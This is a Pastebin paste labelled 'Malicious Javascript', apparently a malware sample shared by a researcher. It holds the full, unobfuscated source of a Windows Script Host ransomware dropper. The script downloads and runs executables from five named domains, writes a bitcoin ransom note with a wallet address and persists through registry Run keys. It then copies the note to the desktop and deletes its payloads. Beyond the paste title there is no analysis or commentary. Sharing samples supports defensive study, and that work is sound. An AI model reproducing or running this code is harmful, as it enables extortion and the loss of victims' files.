dynamoo

Malicious Javascript

Aug 2nd, 2016
370
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var id="LRYB9RcpANpqAc9lNDOe_7o65Gns30h8ZhRx1DBunTW-YHmZvSONzPHomHt9FRlRl53IG-8U9s47bw"; var ad="15R1q8XJmfZUGNy4cWGocZBEVeMsXfECpZ"; var bc="0.54235"; var ld=0; var cq=String.fromCharCode(34); var cs=String.fromCharCode(92); var ll=["opros.mskobr.ru","alacahukuk.com","www.ortoservis.ru","aksoypansiyon.com","samurkasgrup.com"]; var ws=WScript.CreateObject("WScript.Shell"); var fn=ws.ExpandEnvironmentStrings("%TEMP%")+cs+"a"; var pd=ws.ExpandEnvironmentStrings("%TEMP%")+cs+"php4ts.dll"; var xo=WScript.CreateObject("Msxml2.XMLHTTP"); var xa=WScript.CreateObject("ADODB.Stream"); var fo=WScript.CreateObject("Scripting.FileSystemObject"); if (!fo.FileExists(fn+".txt")) { for(var n=1;n<=5;n++) { for(var i=ld;i<ll.length;i++) { var dn=0; try { xo.open("GET","http://"+ll[i]+"/counter/?ad="+ad+"&id="+id+"&rnd="+i+n, false); xo.send(); if(xo.status==200) { xa.open(); xa.type=1; xa.write(xo.responseBody); if(xa.size>1000) { dn=1; if(n<=2){xa.saveToFile(fn+n+".exe",2);try{ws.Run(fn+n+".exe",1,0);}catch(er){};} else if(n==3){xa.saveToFile(fn+".exe",2);} else if(n==4){xa.saveToFile(pd,2);} else if(n==5){xa.saveToFile(fn+".php",2);} }; xa.close(); }; if(dn==1){ld=i;break;}; } catch(er){}; }; }; if(fo.FileExists(fn+".exe") && fo.FileExists(pd) && fo.FileExists(fn+".php")) { var fp=fo.CreateTextFile(fn+".txt",true); fp.WriteLine("ATTENTION!"); fp.WriteLine(""); fp.WriteLine("All your documents, photos, databases and other important personal files"); fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key."); fp.WriteLine("To restore your files you have to pay "+bc+" BTC (bitcoins)."); fp.WriteLine("Please follow this manual:"); fp.WriteLine(""); fp.WriteLine("1. Create Bitcoin wallet here:"); fp.WriteLine(""); fp.WriteLine("      https://blockchain.info/wallet/new"); fp.WriteLine(""); fp.WriteLine("2. Buy "+bc+" BTC with cash, using search here:"); fp.WriteLine(""); fp.WriteLine("      https://localbitcoins.com/buy_bitcoins"); fp.WriteLine(""); fp.WriteLine("3. Send "+bc+" BTC to this Bitcoin address:"); fp.WriteLine(""); fp.WriteLine("      "+ad); fp.WriteLine(""); fp.WriteLine("4. Open one of the following links in your browser to download decryptor:"); fp.WriteLine(""); for (var i=0;i<ll.length;i++) { fp.WriteLine("      http://"+ll[i]+"/counter/?a="+ad); }; fp.WriteLine(""); fp.WriteLine("5. Run decryptor to restore your files."); fp.WriteLine(""); fp.WriteLine("PLEASE REMEMBER:"); fp.WriteLine(""); fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES."); fp.WriteLine("      - Nobody can help you except us."); fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc."); fp.WriteLine("      - Your files can be decrypted only after you make payment."); fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt)."); fp.Close(); ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCU"+cs+"SOFTWARE"+cs+"Microsoft"+cs+"Windows"+cs+"CurrentVersion"+cs+"Run"+cq+" /V "+cq+"Crypted"+cq+" /t REG_SZ /F /D "+cq+fn+".txt"+cq,0,0); ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCR"+cs+".crypted"+cq+" /ve /t REG_SZ /F /D "+cq+"Crypted"+cq,0,0); ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCR"+cs+"Crypted"+cs+"shell"+cs+"open"+cs+"command"+cq+" /ve /t REG_SZ /F /D "+cq+"notepad.exe "+cs+cq+fn+".txt"+cs+cq+cq,0,0); ws.Run("%COMSPEC% /c copy /y "+cq+fn+".txt"+cq+" "+cq+"%AppData%"+cs+"Desktop"+cs+"DECRYPT.txt"+cq,0,0); ws.Run("%COMSPEC% /c copy /y "+cq+fn+".txt"+cq+" "+cq+"%UserProfile%"+cs+"Desktop"+cs+"DECRYPT.txt"+cq,0,0); ws.Run("%COMSPEC% /c "+fn+".exe "+cq+fn+".php"+cq,0,1); ws.Run("%COMSPEC% /c notepad.exe "+cq+fn+".txt"+cq,0,0); var fp=fo.CreateTextFile(fn+".php",true);for(var i=0;i<1000;i++){fp.WriteLine(ad);};fp.Close(); ws.Run("%COMSPEC% /c DEL "+cq+fn+".php"+cq,0,0); ws.Run("%COMSPEC% /c DEL "+cq+fn+".exe"+cq,0,0); ws.Run("%COMSPEC% /c DEL "+cq+pd+cq,0,0); }; };
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×